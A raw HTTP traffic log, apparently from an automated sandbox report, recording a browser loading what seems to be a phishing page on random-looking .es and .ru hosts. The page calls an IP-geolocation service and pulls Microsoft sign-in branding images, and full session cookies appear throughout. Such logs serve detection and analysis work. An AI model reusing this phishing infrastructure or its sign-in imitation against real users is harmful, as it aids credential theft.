XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnb HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://y0x6.tjsqawfetli.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /029543793987973306635WbqhgQMMUHNQKHCMLDDVEJTEMHELOYCHTEGFUQUSSXPUYQFWTrs90Ws437A3NfQvm8To12Rw1aswx35 HTTP/1.1Host: g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=nYZ_G2psz03Qrgs4ghReyyFn_D54jJ9EXMwFBkeeN7bcsCohT8r7f9ZDYOMULSZx1I-QcvZfW-PK5xp9Uxu2KyognI25IRmxB8htOh7aMgElBY84ql-3PhU-LSOWJmK8fIMbDIIiqTw5iQiXYC6jTRAlZYQV2h4zfYG4h9HlaBWCWWvN1bAoZTlsiyIXn-W6wNfj-oG8vA3Y_X2oheEA
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=nYZ_G2psz03Qrgs4ghReyyFn_D54jJ9EXMwFBkeeN7bcsCohT8r7f9ZDYOMULSZx1I-QcvZfW-PK5xp9Uxu2KyognI25IRmxB8htOh7aMgElBY84ql-3PhU-LSOWJmK8fIMbDIIiqTw5iQiXYC6jTRAlZYQV2h4zfYG4h9HlaBWCWWvN1bAoZTlsiyIXn-W6wNfj-oG8vA3Y_X2oheEA
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=nYZ_G2psz03Qrgs4ghReyyFn_D54jJ9EXMwFBkeeN7bcsCohT8r7f9ZDYOMULSZx1I-QcvZfW-PK5xp9Uxu2KyognI25IRmxB8htOh7aMgElBY84ql-3PhU-LSOWJmK8fIMbDIIiqTw5iQiXYC6jTRAlZYQV2h4zfYG4h9HlaBWCWWvN1bAoZTlsiyIXn-W6wNfj-oG8vA3Y_X2oheEA
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=nYZ_G2psz03Qrgs4ghReyyFn_D54jJ9EXMwFBkeeN7bcsCohT8r7f9ZDYOMULSZx1I-QcvZfW-PK5xp9Uxu2KyognI25IRmxB8htOh7aMgElBY84ql-3PhU-LSOWJmK8fIMbDIIiqTw5iQiXYC6jTRAlZYQV2h4zfYG4h9HlaBWCWWvN1bAoZTlsiyIXn-W6wNfj-oG8vA3Y_X2oheEA
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=nYZ_G2psz03Qrgs4ghReyyFn_D54jJ9EXMwFBkeeN7bcsCohT8r7f9ZDYOMULSZx1I-QcvZfW-PK5xp9Uxu2KyognI25IRmxB8htOh7aMgElBY84ql-3PhU-LSOWJmK8fIMbDIIiqTw5iQiXYC6jTRAlZYQV2h4zfYG4h9HlaBWCWWvN1bAoZTlsiyIXn-W6wNfj-oG8vA3Y_X2oheEA
              Source: global trafficHTTP traffic detected: GET /wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/01/MS-Security.png HTTP/1.1Host: www.ivo-security.blogConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; 